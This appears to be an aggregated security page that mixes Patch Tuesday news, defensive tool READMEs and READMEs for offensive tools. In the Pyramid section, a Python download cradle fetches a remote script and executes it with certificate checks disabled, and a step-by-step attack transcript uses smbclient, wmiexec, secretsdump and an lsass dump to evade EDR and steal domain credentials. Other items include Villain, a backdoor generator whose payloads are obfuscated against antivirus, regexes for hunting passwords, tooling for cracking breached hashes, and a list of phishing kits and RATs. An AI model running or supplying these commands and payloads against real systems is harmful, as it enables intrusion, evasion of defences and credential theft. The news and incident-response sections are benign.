Microsoft Patch Tuesday, January 2023 Edition

Microsoft today released updates to fix nearly 100 security flaws in its Windows operating systems and other software. Highlights from the first Patch Tuesday of 2023 include a zero-day vulnerability in Windows, printer software flaws reported by the U.S. National Security Agency, and a critical Microsoft SharePoint Server bug that allows a remote, unauthenticated attacker to make an anonymous connection.

At least 11 of the patches released today are rated “Critical” by Microsoft, meaning they could be exploited by malware or malcontents to seize remote control over vulnerable Windows systems with little or no help from users.

Of particular concern for organizations running Microsoft SharePoint Server is CVE-2023-21743. This is a Critical security bypass flaw that could allow a remote, unauthenticated attacker to make an anonymous connection to a vulnerable SharePoint server. Microsoft says this flaw is “more likely to be exploited” at some point.

But patching this bug may not be as simple as deploying Microsoft updates. Dustin Childs, head of threat awareness at Trend Micro’s Zero Day Initiative, said sysadmins need to take additional measures to be fully protected from this vulnerability.

“To fully resolve this bug, you must also trigger a SharePoint upgrade action that’s also included in this update,” Childs said. “Full details on how to do this are in the bulletin. Situations like this are why people who scream ‘Just patch it!’ show they have never actually had to patch an enterprise in the real world.”

Eighty-seven of the vulnerabilities earned Redmond’s slightly less dire “Important” severity rating. That designation describes vulnerabilities “whose exploitation could result in compromise of the confidentiality, integrity, or availability of user data, or of the integrity or availability of processing resources.”

Among the more Important bugs this month is CVE-2023-21674, which is an “elevation of privilege” weakness in most supported versions of Windows that has already been abused in active attacks.

Satnam Narang, senior staff research engineer at Tenable, said although details about the flaw were not available at the time Microsoft published its advisory on Patch Tuesday, it appears this was likely chained together with a vulnerability in a Chromium-based browser such as Google Chrome or Microsoft Edge in order to break out of a browser’s sandbox and gain full system access.

“Vulnerabilities like CVE-2023-21674 are typically the work of advanced persistent threat (APT) groups as part of targeted attacks,” Narang said. “The likelihood of future widespread exploitation of an exploit chain like this is limited due to auto-update functionality used to patch browsers.”

By the way, when was the last time you completely closed out your Web browser and restarted it? Some browsers will automatically download and install new security updates, but the protection from those updates usually only happens after you restart the browser.

Speaking of APT groups, the U.S. National Security Agency is credited with reporting CVE-2023-21678, which is another “important” vulnerability in the Windows Print Spooler software.

There have been so many vulnerabilities patched in Microsoft’s printing software over the past year (including the dastardly PrintNightmare attacks and borked patches) that KrebsOnSecurity has joked about Patch Tuesday reports being sponsored by Print Spooler. Tenable’s Narang points out that this is the third Print Spooler flaw the NSA has reported in the last year.

Kevin Breen at Immersive Labs called special attention to CVE-2023-21563, which is a security feature bypass in BitLocker, the data and disk encryption technology built into enterprise versions of Windows.

“For organizations that have remote users, or users that travel, this vulnerability may be of interest,” Breen said. “We rely on BitLocker and full-disk encryption tools to keep our files and data safe in the event a laptop or device is stolen. While information is light, this appears to suggest that it could be possible for an attacker to bypass this protection and gain access to the underlying operating system and its contents. If security teams are not able to apply this patch, one potential mitigation could be to ensure Remote Device Management is deployed with the ability to remotely disable and wipe assets.”

There are also two Microsoft Exchange vulnerabilities patched this month — CVE-2023-21762 and CVE-2023-21745. Given the rapidity with which threat actors exploit new Exchange bugs to steal corporate email and infiltrate vulnerable systems, organizations using Exchange should patch immediately. Microsoft’s advisory says these Exchange flaws are indeed “more likely to be exploited.”

Adobe released four patches addressing 29 flaws in Adobe Acrobat and Reader, InDesign, InCopy, and Adobe Dimension. The update for Reader fixes 15 bugs with eight of these being ranked Critical in severity (allowing arbitrary code execution if an affected system opened a specially crafted file).

For a more granular rundown on the updates released today, see the SANS Internet Storm Center roundup. Nearly 100 updates is a lot, and there are bound to be a few patches that cause problems for organizations and end users. When that happens, AskWoody.com usually has the lowdown.

Please consider backing up your data and/or imaging your system before applying any updates. And please sound off in the comments if you experience any problems as a result of these patches.

Villain - Windows And Linux Backdoor Generator And Multi-Session Handler That Allows Users To Connect With Sibling Servers And Share Their Backdoor Sessions

Villain is a Windows & Linux backdoor generator and multi-session handler that allows users to connect with sibling servers (other machines running Villain) and share their backdoor sessions, handy for working as a team.

The main idea behind the payloads generated by this tool is inherited from HoaxShell. One could say that Villain is an evolved, steroid-induced version of it.

Video Presentation

[2022-11-30] Recent & awesome, made by John Hammond -> youtube.com/watch?v=pTUggbSCqA0
[2022-11-14] Original release demo, made by me -> youtube.com/watch?v=NqZEmBsLCvQ

Disclaimer: Running the payloads generated by this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.

Installation & Usage

git clone https://github.com/t3l3machus/Villain
cd ./Villain
pip3 install -r requirements.txt

You should run as root:

Villain.py [-h] [-p PORT] [-x HOAX_PORT] [-c CERTFILE] [-k KEYFILE] [-u] [-q]

For more information about using Villain check out the Usage Guide.

Important Notes

1. Villain has a built-in auto-obfuscate payload function to assist users in bypassing AV solutions (for Windows payloads). As a result, payloads are undetected (for the time being).
2. Each generated payload is going to work only once. An already used payload cannot be reused to establish a session.
3. The communication between sibling servers is AES encrypted using the recipient sibling server's ID as the encryption KEY and the 16 first bytes of the local server's ID as IV. During the initial connection handshake of two sibling servers, each server's ID is exchanged clear text, meaning that the handshake could be captured and used to decrypt traffic between sibling servers. I know it's "weak" that way. It's not supposed to be super secure as this tool was designed to be used during penetration testing / red team assessments, for which this encryption schema should be enough.
4. Villain instances connected with each other (sibling servers) must be able to directly reach each other as well. I intend to add a network route mapping utility so that sibling servers can use one another as a proxy to achieve cross network communication between them.

Approach

A few notes about the http(s) beacon-like reverse shell approach:

Limitations

• A backdoor shell is going to hang if you execute a command that initiates an interactive session. For more information read this.

Advantages

• When it comes to Windows, the generated payloads can run even in PowerShell constraint Language Mode.
• The generated payloads can run even by users with limited privileges.

Contributions

Pull requests are generally welcome. Please, keep in mind: I am constantly working on new offsec tools as well as maintaining several existing ones. I rarely accept pull requests because I either have a plan for the course of a project or I evaluate that it would be hard to test and/or maintain the foreign code. It doesn't have to do with how good or bad is an idea, it's just too much work and also, I am kind of developing all these tools to learn myself.

There are parts of this project that were removed before publishing because I considered them to be buggy or hard to maintain (at this early stage). If you have an idea for an addition that comes with a significant chunk of code, I suggest you first contact me to discuss if there's something similar already in the making, before making a PR.

Subparse - Modular Malware Analysis Artifact Collection And Correlation Framework

Subparse, is a modular framework developed by Josh Strochein, Aaron Baker, and Odin Bernstein. The framework is designed to parse and index malware files and present the information found during the parsing in a searchable web-viewer. The framework is modular, making use of a core parsing engine, parsing modules, and a variety of enrichers that add additional information to the malware indices. The main input values for the framework are directories of malware files, which the core parsing engine or a user-specified parsing engine parses before adding additional information from any user-specified enrichment engine all before indexing the information parsed into an elasticsearch index. The information gathered can then be searched and viewed via a web-viewer, which also allows for filtering on any value gathered from any file. There are currently 3 parsing engine, the default parsing modules (ELFParser, OLEParser and PEParser), and 4 enrichment modules (ABUSEEnricher, C APEEnricher, STRINGEnricher and YARAEnricher).

Getting Started

Software Requirements

To get started using Subparse there are a few requrired/recommened programs that need to be installed and setup before trying to work with our software.

Additional Requirements

After getting the required/recommended software installed to your system there are a few other steps that need to be taken to get Subparse installed.

sudo get apt install build-essential
pip3 install -r ./requirements.txt

docker-compose up

Note: This might take a little time due to downloading the images and setting up the containers that will be needed by Subparse.

Installation steps

• Installation Steps

Usage

Command Line Options

Command line options that are available for subparse/parser/subparse.py:

Viewing Results

To view the results from Subparse's parsers, navigate to localhost:8080. If you are having trouble viewing the site, make sure that you have the container started up in Docker and that there is not another process running on port 8080 that could cause the site to not be available.

General Information Collected

Before any parser is executed general information is collected about the sample regardless of the underlying file type. This information includes:

• MD5 hash of the sample
• SHA256 hash of the sample
• Sample name
• Sample size
• Extension of sample
• Derived extension of sample

Parser Modules

Parsers are ONLY executed on samples that match the file type. For example, PE files will by default have the PEParser executed against them due to the file type corresponding with those the PEParser is able to examine.

Default Modules

• General Information
• Program Headers
• Section Headers
• Notes
• Architecture Specific Data
• Version Information
• Arm Unwind Information
• Relocation Data
• Dynamic Tags

• Meta Data
• MRaptor
• RTF
• Times
• Indicators
• VBA / VBA Macros
• OLE Objects

• Section code and count
• Entry point
• Image base
• Signature
• Imports
• Exports

Enricher Modules

These modules are optional modules that will ONLY get executed if specified via the -e | --enrichers flag on the command line.

Default Modules

Developing Custom Parsers & Enrichers

Subparse's web view was built using Bootstrap for its CSS, this allows for any built in Bootstrap CSS to be used when developing your own custom Parser/Enricher Vue.js files. We have also provided an example for each to help get started and have also implemented a few custom widgets to ease the process of development and to promote standardization in the way information is being displayed. All Vue.js files are used for dynamically displaying information from the custom Parser/Enricher and are used as templates for the data.

Note: Naming conventions with both class and file names must be strictly adheared to, this is the first thing that should be checked if you run into issues now getting your custom Parser/Enricher to be executed. The naming convention of your Parser/Enricher must use the same name across all of the files and class names.

• Python Development
• Vue Development
• Vue Helpers

Logging

The logger object is a singleton implementation of the default Python logger. For indepth usage please reference the Offical Doc. For Subparse the only logging methods that we recommend using are the logging levels for output. These are:

• debug
• warning
• error
• critical
• exception
• log
• info

ACKNOWLEDGEMENTS

• This research and all the co-authors have been supported by NSA Grant H98230-20-1-0326.

Top 20 Most Popular Hacking Tools in 2022

1. Zphisher - Automated Phishing Tool





2. CiLocks - Android LockScreen Bypass





3. Arkhota - A Web Brute Forcer For Android





4. GodGenesis - A Python3 Based C2 Server To Make Life Of Red Teamer A Bit Easier. The Payload Is Capable To Bypass All The Known Antiviruses And Endpoints





5. AdvPhishing - This Is Advance Phishing Tool! OTP PHISHING





6. Modded-Ubuntu - Run Ubuntu GUI On Your Termux With Much Features





7. Android-PIN-Bruteforce - Unlock An Android Phone (Or Device) By Bruteforcing The Lockscreen PIN





8. Android_Hid - Use Android As Rubber Ducky Against Another Android Device





9. Cracken - A Fast Password Wordlist Generator, Smartlist Creation And Password Hybrid-Mask Analysis Tool





10. HackingTool - ALL IN ONE Hacking Tool For Hackers





11. Arbitrium-RAT - A Cross-Platform, Fully Undetectable Remote Access Trojan, To Control Android, Windows And Linux





12. Weakpass - Rule-Based Online Generator To Create A Wordlist Based On A Set Of Words





13. Geowifi - Search WiFi Geolocation Data By BSSID And SSID On Different Public Databases





14. BITB - Browser In The Browser (BITB) Templates





15. Blackbird - An OSINT Tool To Search For Accounts By Username In 101 Social Networks





16. Espoofer - An Email Spoofing Testing Tool That Aims To Bypass SPF/DKIM/DMARC And Forge DKIM Signatures





17. Pycrypt - Python Based Crypter That Can Bypass Any Kinds Of Antivirus Products





18. Grafiki - Threat Hunting Tool About Sysmon And Graphs





19. VLANPWN - VLAN Attacks Toolkit





20. linWinPwn - A Bash Script That Automates A Number Of Active Directory Enumeration And Vulnerability Checks

OFRAK - Unpack, Modify, And Repack Binaries

OFRAK (Open Firmware Reverse Analysis Konsole) is a binary analysis and modification platform. OFRAK combines the ability to:

• Identify and Unpack many binary formats
• Analyze unpacked binaries with field-tested reverse engineering tools
• Modify and Repack binaries with powerful patching strategies

OFRAK supports a range of embedded firmware file formats beyond userspace executables, including:

• Compressed filesystems
• Compressed & checksummed firmware
• Bootloaders
• RTOS/OS kernels

OFRAK equips users with:

• A Graphical User Interface (GUI) for interactive exploration and visualization of binaries
• A Python API for readable and reproducible scripts that can be applied to entire classes of binaries, rather than just one specific binary
• Recursive identification, unpacking, and repacking of many file formats, from ELF executables, to filesystem archives, to compressed and checksummed firmware formats
• Built-in, extensible integration with powerful analysis backends (angr, Binary Ninja, Ghidra, IDA Pro)
• Extensibility by design via a common interface to easily write additional OFRAK components and add support for a new file format or binary patching operation

See ofrak.com for more details.

GUI Frontend

The web-based GUI view provides a navigable resource tree. For the selected resource, it also provides: metadata, hex or text navigation, and a mini map sidebar for quickly navigating by entropy, byteclass, or magnitude. The GUI also allows for actions normally available through the Python API like commenting, unpacking, analyzing, modifying and packing resources.

Getting Started

OFRAK uses Git LFS. This means that you must have Git LFS installed before you clone the repository! Install Git LFS by following the instructions here. If you accidentally cloned the repository before installing Git LFS, cd into the repository and run git lfs pull.

See docs/environment-setup for detailed instructions on how to install OFRAK.

Documentation

OFRAK has general documentation and API documentation. Both can be viewed at ofrak.com/docs.

If you wish to make changes to the documentation or serve it yourself, follow the directions in docs/README.md.

License

The code in this repository comes with an OFRAK Community License, which is intended for educational uses, personal development, or just having fun.

Users interested in OFRAK for commercial purposes can request the Pro License, which for a limited period is available for a free 6-month trial. See OFRAK Licensing for more information.

Contributing

Red Balloon Security is excited for security researchers and developers to contribute to this repository.

For details, please see our contributor guide and the Python development guide.

Support

Please contact ofrak@redballoonsecurity.com, or write to us on the OFRAK Slack with any questions or issues regarding OFRAK. We look forward to getting your feedback! Sign up for the OFRAK Mailing List to receive monthly updates about OFRAK code improvements and new features.

This material is based in part upon work supported by the DARPA under Contract No. N66001-20-C-4032. Any opinions, findings and conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of the DARPA. Distribution Statement “A” (Approved for Public Release, Distribution Unlimited).

Octosuite - Advanced Github OSINT Framework

A framework fro gathering osint on GitHub users, repositories and organizations

Wiki

Refer to the Wiki for installation instructions, in addition to all other documentation.

Features

• Fetches an organization's profile information
• Fetches an oganization's events
• Returns an organization's repositories
• Returns an organization's public members
• Fetches a repository's information
• Returns a repository's contributors
• Returns a repository's languages
• Fetches a repository's stargazers
• Fetches a repository's forks
• Fetches a repository's releases
• Returns a list of files in a specified path of a repository
• Fetches a user's profile information
• Returns a user's gists
• Returns organizations that a user owns/belongs to
• Fetches a user's events
• Fetches a list of users followed by the target
• Fetches a user's followers
• Checks if user A follows user B
• Checks if user is a public member of an organizations
• Returns a user's subscriptions
• Gets a user's subscriptions
• Gets a user's events
• Searches users
• Searches repositories
• Searches topics
• Searches issues
• Searches commits
• Automatically logs network activity (.logs folder)
• User can view, read and delete logs
• ...And more

Note

Octosuite automatically logs network and user activity of each session, the logs are saved by date and time in the .logs folder

Microsoft Patch Tuesday, December 2022 Edition

Microsoft has released its final monthly batch of security updates for 2022, fixing more than four dozen security holes in its various Windows operating systems and related software. The most pressing patches include a zero-day in a Windows feature that tries to flag malicious files from the Web, a critical bug in PowerShell, and a dangerous flaw in Windows 11 systems that was detailed publicly prior to this week’s Patch Tuesday.

The security updates include patches for Azure, Microsoft Edge, Office, SharePoint Server, SysInternals, and the .NET framework. Six of the update bundles earned Microsoft’s most dire “critical” rating, meaning they fix vulnerabilities that malware or malcontents can use to remotely commandeer an unpatched Windows system — with little to no interaction on the part of the user.

The bug already seeing exploitation is CVE-2022-44698, which allows attackers to bypass the Windows SmartScreen security feature. The vulnerability allows attackers to craft documents that won’t get tagged with Microsoft’s “Mark of the Web,” despite being downloaded from untrusted sites.

“This means no Protected View for Microsoft Office documents, making it easier to get users to do sketchy things like execute malicious macros, said Greg Wiseman, product manager at security firm Rapid7. This is the second Mark of the Web flaw Microsoft has patched in as many months; both were first publicly detailed over the past two months on Twitter by security researcher Will Dormann.

Publicly disclosed (but not actively exploited for now) is CVE-2022-44710, which is an elevation of privilege flaw in the DirectX graphics component of Windows 11.

Another notable critical bug is CVE-2022-41076, a remote code execution flaw in PowerShell — a key component of Windows that makes it easier to automate system tasks and configurations.

Kevin Breen at Immersive Labs said while Microsoft doesn’t share much detail about CVE-2022-41076 apart from the designation ‘Exploitation More Likely,’ they also note that successful exploitation requires an attacker to take additional actions to prepare the target environment.

“What actions are required is not clear; however, we do know that exploitation requires an authenticated user level of access,” Breen said. “This combination suggests that the exploit requires a social engineering element, and would likely be seen in initial infections using attacks like MalDocs or LNK files.”

Speaking of malicious documents, Trend Micro’s Zero Day Initiative highlights CVE-2022-44713, a spoofing vulnerability in Outlook for Mac.

“We don’t often highlight spoofing bugs, but anytime you’re dealing with a spoofing bug in an e-mail client, you should take notice,” ZDI’s Dustin Childs wrote. “This vulnerability could allow an attacker to appear as a trusted user when they should not be. Now combine this with the SmartScreen Mark of the Web bypass and it’s not hard to come up with a scenario where you receive an e-mail that appears to be from your boss with an attachment entitled “Executive_Compensation.xlsx”. There aren’t many who wouldn’t open that file in that scenario.”

Microsoft also released guidance on reports that certain software drivers certified by Microsoft’s Windows Hardware Developer Program were being used maliciously in post-exploitation activity.

Three different companies reported evidence that malicious hackers were using these signed malicious driver files to lay the groundwork for ransomware deployment inside victim organizations. One of those companies, Sophos, published a blog post Tuesday detailing how the activity was tied to the Russian ransomware group Cuba, which has extorted an estimated $60 million from victims since 2019.

Of course, not all scary and pressing security threats are Microsoft-based. Also on Tuesday, Apple released a bevy of security updates to iOS, iPadOS, macOS, tvOS and Safari, including  a patch for a newly discovered zero-day vulnerability that could lead to remote code execution.

Anyone responsible for maintaining Fortinet or Citrix remote access products probably needs to update, as both are dealing with active attacks on just-patched flaws.

For a closer look at the patches released by Microsoft today (indexed by severity and other metrics) check out the always-useful Patch Tuesday roundup from the SANS Internet Storm Center. And it’s not a bad idea to hold off updating for a few days until Microsoft works out any kinks in the updates: AskWoody.com usually has the lowdown on any patches that may be causing problems for Windows users.

As always, please consider backing up your system or at least your important documents and data before applying system updates. And if you run into any problems with these updates, please drop a note about it here in the comments.

Pyramid - A Tool To Help Operate In EDRs' Blind Spots

What is it

Pyramid is a set of Python scripts and module dependencies that can be used to evade EDRs. The main purpose of the tool is to perform offensive tasks by leveraging some Python evasion properties and looking as a legit Python application usage. This can be achieved because:

1. the Python Embeddable package provides a signed Python interpreter with good reputation;
2. Python has many legit applications, so there is a lot of different telemetry coming from the python.exe binary since the interpreter natively runs the APIs. This can be abused by operating within the Python.exe process and trying to blend in the huge "telemetry fingerprint" of python.exe binary.
3. There is a lack of auditing for Python code execution - PEP-578 tried to solve that but the stock python.exe binary does not have auditing capabilities enabled by default.
4. Operations can be done natively from within python.exe natively using Python language to perform post exploitation tasks such as dynamically importing Python modules to run offensive tools and executing Beacon Object Files (after some BOF modifications) directly within python.exe.

For more information please check the DEFCON30 - Adversary village talk "Python vs Modern Defenses" slide deck and this post on my blog.

Disclaimer

This tool was created to demostrate a bypass strategy against EDRs based on some blind-spots assumptions. It is a combination of already existing techniques and tools in a (to the best of my knowledge) novel way that can help evade defenses. The sole intent of the tool is to help the community increasing awareness around this kind of usage and accelerate a resolution. It' not a 0day, it's not a full fledged shiny C2, Pyramid exploits what might be EDRs blind spots and the tool has been made public to shed some light on them. A defense paragraph has been included, hoping that experienced blue-teamers can help contribute and provide better possible resolution on the issue Pyramid aims to highlight. All information is provided for educational purposes only. Follow instructions at your own risk. Neither the author nor his employer are responsible for any direct or consequential damage or loss arising from any person or organization.

Credits

Pyramid is using some awesome tools made by:

• xorrior for Empyre - Finder Class

• TrustedSec for COFFLoader

• Falconforcenl for bof2shellcode

• S4ntiagoP for nanodump

Contributors

snovvcrash - base-DonPAPI.py - base-LaZagne.py - base-clr.py

Current features

Pyramid capabilities are executed directly from python.exe process and are currently:

1. Dynamic loading of BloodHound Python, impacket secretsdump, paramiko, DonPAPI, LaZagne, Pythonnet, pproxy.
2. BOFs execution using in-process shellcode injection.
3. In-process injection of a C2 agent and tunneling its traffic with local SSH port forwarding.

Tool's description

Pyramid is meant to be used unpacking an official embeddable Python package and then running python.exe to execute a Python download cradle. This is a simple way to avoid creating uncommon Process tree pattern and looking like a normal Python application usage.

In Pyramid the download cradle is used to reach a Pyramid Server (simple HTTPS server with auth) to fetch base scripts and dependencies.

Base scripts are specific for the feature you want to use and contain:

1. Custom Finder class to in-memory import required dependencies (zip files).
2. Code to download the required dependencies.
3. Main logic for the module you want to execute (bloodhound, secretsdump, paramiko etc.).

BOFs are ran through a base script containing the shellcode resulted from bof2shellcode and the related in-process injection code.

The Python dependencies have been already fixed and modified to be imported in memory without conflicting.

There are currently 8 main base scripts available:

1. base-bh.py script will in-memory import and execute python-BloodHound.
2. base-secretsdump.py script will in-memory import and execute Impacket secretsdump.
3. base-BOF-lsass.py script is using a stripped version of nanodump to dump lsass from python.exe. This is achieved in-memory injecting shellcode output obtained from bof2shellcode and COFFloader. To make complex BOFs work with this technique, they should first be adapted for Python execution.
4. base-tunnel-inj.py script import and executes paramiko on a new Thread to create an SSH local port forward to a remote SSH server. Afterward a shellcode can be locally injected in python.exe.
5. base-DonPAPI.py script will in-memory import and execute DonPAPI. Results and credentials extracted are saved on disk in the Python Embeddable Package Directory.
6. base-LaZagne.py script will in-memory import and execute LaZagne
7. base-tunnel-socks5 script import and executes paramiko on a new Thread to create an SSH remote port forward to an SSH server, then a socks5 proxy server is executed locally on target and made accessible remotely through the SSH tunnel.
8. base-clr script imports Pythonnet to load and execute a .NET assembly in-memory.

Usage

Starting the server

git clone https://github.com/naksyn/Pyramid

Generate SSL certificates for HTTP Server:

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365

Example of running Pyramid HTTP Server using SSL certificate and by providing Basic Authentication:

python3 PyramidHTTP.py 443 testuser Sup3rP4ss! /home/user/SSL/key.pem /home/user/SSL/cert.pem /home/user/Pyramid/Server/

Modifying Base Scripts

base-bh.py

Insert AD details and HTTPS credentials in the upper part of the script.

base-secretsdump.py

Insert AD details and HTTPS credentials in the upper part of the script.

base-BOF-lsass.py

The nanodump BOF has been modified stripping Beacon API calls, cmd line parsing and hardcoding input arguments in order to use the process forking technique and outputting lsass dump to C:\Users\Public\video.avi. To change these settings modify nanodump source file entry.c accordingly and recompile the BOF. Then use the tool bof2shellcode giving as input the compiled nanodump BOF:

python3 bof2shellcode.py -i /home/user/bofs/nanodump.x64.o -o nanodump.x64.bin

You can transform the resulting shellcode to python format using msfvenom:

msfvenom -p generic/custom PAYLOADFILE=nanodump.x64.bin -f python > sc_nanodump.txt

Then paste it into the base script within the shellcode variable.

base-tunnel-inj.py

Insert SSH server, local port forward details details and HTTPS credentials in the upper part of the script and modify the sc variable using your preferred shellcode stager. Remember to tunnel your traffic using SSH local port forward, so the stager should have 127.0.0.1 as C2 server and the SSH listening port as the C2 port.

base-DonPAPI.py

Insert AD details and HTTPS credentials in the upper part of the script.

base-LaZagne.py

Insert HTTPS credentials in the upper part of the script and change lazagne module if needed.

base-clr.py

Insert HTTPS credentials in the upper part of the script and assembly bytes of the file you want to load.

base-tunnel-socks5.py

Insert parameters in the upper part of the script.

Unzip embeddable package and execute the download cradle on target

Once the Pyramid server is running and the Base script is ready you can execute the download cradle from python.exe. A Python download cradle can be as simple as:

import urllib.request
import base64
import ssl

gcontext = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
gcontext.check_hostname = False
gcontext.verify_mode = ssl.CERT_NONE
request = urllib.request.Request('https://myIP/base-bof.py')
base64string = base64.b64encode(bytes('%s:%s' % ('testuser', 'Sup3rP4ss!'),'ascii'))
request.add_header("Authorization", "Basic %s" % base64string.decode('utf-8'))
result = urllib.request.urlopen(request, context=gcontext)
payload = result.read()
exec(payload)

Bear in mind that urllib is an Embeddable Package native Python module, so you don't need to install additional dependencies for this cradle. The downloaded python "base" script will in-memory import the dependencies and execute its capabilites within the python.exe process.

Executing Pyramid without visible prompt

To execute Pyramid without bringing up a visible python.exe prompt you can leverage pythonw.exe that won't open a console window upon execution and is contained in the very same Windows Embeddable Package. The following picture illustrate an example usage of pythonw.exe to execute base-tunnel-socks5.py on a remote machine without opening a python.exe console window.

The attack transcript is reported below:

Start Pyramid Server:

python3 PyramidHTTP.py 443 testuser Sup3rP4ss! /home/nak/projects/dev/Proxy/Pyramid/key.pem /home/nak/projects/dev/Proxy/Pyramid/cert.pem /home/nak/projects/dev/Proxy/Pyramid/Server/

Save the base download cradle to cradle.py.

Copy unpacked windows Embeddable Package (with cradle.py) to target:

smbclient //192.168.1.11/C$ -U domain/user -c 'prompt OFF; recurse ON; lcd /home/user/Downloads/python-3.10.4-embed-amd64; cd Users\Public; mkdir python-3.10.4-embed-amd64; cd python-3.10.4-embed-amd64; mput *'

Execute pythonw.exe to launch the cradle:

/usr/share/doc/python3-impacket/examples/wmiexec.py domain/user:"Password1\!"@192.168.1.11 'C:\Users\Public\python-3.10.4-embed-amd64\pythonw.exe C:\Users\Public\python-3.10.4-embed-amd64\cradle.py'

Socks5 server is running on target and SSH tunnel should be up, so modify proxychains.conf and tunnel traffic through target:

proxychains impacket-secretsdump domain/user:"Password1\!"@192.168.1.50 -just-dc

Limitations

Dynamically loading Python modules does not natively support importing *.pyd files that are essentially dlls. The only public solution to my knowledge that solves this problem is provided by Scythe *(in-memory-execution) by re-engineering the CPython interpreter. In ordrer not to lose the digital signature, one solution that would allow using the native Python embeddable package involves dropping on disk the required pyd files or wheels. This should not have significant OPSEC implications in most cases, however bear in mind that the following wheels containing pyd files are dropped on disk to allow Dinamic loading to complete: *. Cryptodome - needed by Bloodhound-Python, Impacket, DonPAPI and LaZagne *. bcrypt, cryptography, nacl, cffi - needed by paramiko

• please note that running BOFs does not need dropping any pyd on disk since this techniques only involves shellcode injection.

How to defend from this technique

Python.exe is a signed binary with good reputation and does not provide visibility on Python dynamic code. Pyramid exploits these evasion properties carrying out offensive tasks from within the same python.exe process.

For this reason, one of the most efficient solution would be to block by default binaries and dlls signed by Python Foundation, creating exceptions only for users that actually need to use python binaries.

Alerts on downloads of embeddable packages can also be raised.

Deploying PEP-578 is also feasible although complex, this is a sample implementation. However, deploying PEP-578 without blocking the usage of stock python binaries could make this countermeasure useless.

Pylirt - Python Linux Incident Response Toolkit

With this application, it is aimed to accelerate the incident response processes by collecting information in linux operating systems.

Features

Information is collected in the following contents.

/etc/passwd

cat /etc/group

cat /etc/sudoers

lastlog

cat /var/log/auth.log

uptime/proc/meminfo

ps aux

/etc/resolv.conf

/etc/hosts

iptables -L -v -n

find / -type f -size +512k -exec ls -lh {}/;

find / -mtime -1 -ls

ip a

netstat -nap

arp -a

echo $PATH

Installation

git clone https://github.com/anil-yelken/pylirt

cd pylirt

sudo pip3 install paramiko

Usage

The following information should be specified in the cred_list.txt file:

IP|Username|Password

sudo python3 plirt.py

Contact

https://twitter.com/anilyelken06

https://medium.com/@anilyelken

Open Source Ransomware Toolkit Cryptonite Turns Into Accidental Wiper Malware

Pywirt - Python Windows Incident Response Toolkit

With this application, it is aimed to accelerate the incident response processes by collecting information in windows operating systems via winrm.

Features

Information is collected in the following contents.

IP Configuration

Users

Groups

Tasks

Services

Task Scheduler

Registry Control

Active TCP & UDP ports

File sharing

Files

Firewall Config

Sessions with other Systems

Open Sessions

Log Entries

Installation

git clone https://github.com/anil-yelken/pywirt

cd pywirt

pip3 install pywinrm

Usage

The following information should be specified in the cred_list.txt file:

IP|Username|Password

Contact

https://twitter.com/anilyelken06

https://medium.com/@anilyelken

D4TA-HUNTER - GUI Osint Framework With Kali Linux

D4TA-HUNTER is a tool created in order to automate the collection of information about the employees of a company that is going to be audited for ethical hacking.

In addition, in this tool we can find in the "search company" section by inserting the domain of a company, emails of employees, subdomains and IP's of servers.

GET API KEY

Register on https://rapidapi.com/rohan-patra/api/breachdirectory

Install

git clone https://github.com/micro-joan/D4TA-HUNTER
cd D4TA-HUNTER/
chmod +x run.sh
./run.sh

After executing the application launcher you need to have all the components installed, the launcher will check one by one, and in the case of not having any component installed it will show you the statement that you must enter to install it:

Use

First you must have a free or paid api-key from BreachDirectory.org, if you don't have one and do a search D4TA-HUNTER provides you with a guide on how to get one.

Once you have the api-key you will be able to search for emails, with the advantage of showing you a list of all the password hashes ready for you to copy and paste into one of the online resources provided by D4TA-HUNTER to crack passwords 100 % free.

You can also insert a domain of a company and D4TA-HUNTER will search for employee emails, subdomains that may be of interest together with IP's of machines found:

Apis and tools

EvilTree - A Remake Of The Classic "Tree" Command With The Additional Feature Of Searching For User Provided Keywords/Regex In Files, Highlighting Those That Contain Matche

A standalone python3 remake of the classic "tree" command with the additional feature of searching for user provided keywords/regex in files, highlighting those that contain matches. Created for two main reasons:

• While searching for secrets in files of nested directory structures, being able to visualize which files contain user provided keywords/regex patterns and where those files are located in the hierarchy of folders, provides a significant advantage.
• "tree" is an amazing tool for analyzing directory structures. It's really handy to have a standalone alternative of the command for post-exploitation enumeration as it is not pre-installed on every linux distro and is kind of limited on Windows (compared to the UNIX version).

Usage Examples

Example #1: Running a regex that essentially matches strings similar to: password = something against /var/www

Example #2: Using comma separated keywords instead of regex:

Further Options & Usage Tips

Notable features:

• Regex -x search actually returns a unique list of all matched patterns in a file. Be careful when combining it with -v (--verbose), try to be specific and limit the length of chars to match.
• You can search keywords/regex in binary files as well by providing option -b.
• You can use this tool as the classic "tree" command if you do not provide keywords -k and regex -x values. This is useful in case you have gained a limited shell on a machine and want to have "tree" with colored output to look around.
• There's a list variable filetype_blacklist in eviltree.py which can be used to exclude certain file extensions from content search. By default, it excludes the following: gz, zip, tar, rar, 7z, bz2, xz, deb, img, iso, vmdk, dll, ovf, ova.
• A quite useful feature is the -i (--interesting-only) option. It instructs eviltree to list only files with matching keywords/regex content, significantly reducing the output length:
  
  

Useful keywords/regex patterns

• Regex to look for passwords: -x ".{0,3}passw.{0,3}[=]{1}.{0,18}"
• Keywords to look for sensitive info: -k passw,db_,admin,account,user,token

Nighthawk Likely to Become Hackers' New Post-Exploitation Tool After Cobalt Strike

Slicer - Tool To Automate The Boring Process Of APK Recon

A tool to automate the recon process on an APK file.

Slicer accepts a path to an extracted APK file and then returns all the activities, receivers, and services which are exported and have null permissions and can be externally provoked.

Note: The APK has to be extracted via jadx or apktool.

Summary

Why?

I started bug bounty like 3 weeks ago(in June 2020) and I have been trying my best on android apps. But I noticed one thing that in all the apps there were certain things which I have to do before diving in deep. So I just thought it would be nice to automate that process with a simple tool.

Why not drozer?

Well, drozer is a different beast. Even though it does finds out all the accessible components but I was tired of running those commands again and again.

Why not automate using drozer?

I actually wrote a bash script for running certain drozer commands so I won't have to run them manually but there was still some boring stuff that had to be done. Like Checking the strings.xml for various API keys, testing if firebase DB was publically accessible or if those google API keys have setup any cap or anything on their usage and lot of other stuff.

Why not search all the files?

I think that a tool like grep or ripgrep would be much faster to search through all the files. So if there is something specific that you want to search it would be better to use those tools. But if you think that there is something which should be checked in all the android files then feel free to open an issue.

Features

• Check if the APK has set the android:allowbackup to true

• Check if the APK has set the android:debuggable to true.

